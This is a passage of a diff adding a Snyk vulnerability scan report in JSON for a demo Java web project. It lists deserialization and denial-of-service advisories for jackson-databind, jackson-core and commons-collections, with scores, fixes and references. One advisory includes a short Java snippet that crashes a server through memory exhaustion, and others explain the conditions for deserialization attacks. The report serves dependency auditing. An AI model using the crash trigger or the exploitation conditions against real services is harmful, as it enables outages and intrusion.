"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.593938Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19360" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f9hv-mg5h-xcw9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:23.673097Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:34.457712Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.548577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19361" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx9v-gmh4-mgqw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:31.715185Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:43Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.091904Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Alessio Soldano" + ], + "semver": { + "vulnerable": [ + "[,2.8.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", + "className": "UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", + "className": "ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/pull/322", + "title": "GitHub PR" + }, + { + "url": "https://issues.jboss.org/browse/JBEAP-6316", + "title": "Jira Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + 
"cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:01.546686Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-01-12T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:01.546686Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "title": "Denial of Service (DoS)", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "gmethwin@github" + ], + "semver": { + "vulnerable": [ + "[2.3.0-rc1,2.7.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", + "className": "UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", + "className": "WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-core/issues/315", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:48.004490Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). 
When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-08-25T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:55:48.004490Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "title": "Deserialization of Untrusted 
Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "transform" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.078866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
+ "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", + "epssDetails": { + "percentile": "0.88407", + "probability": "0.01844", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-7501" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "transform" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:38.421377Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
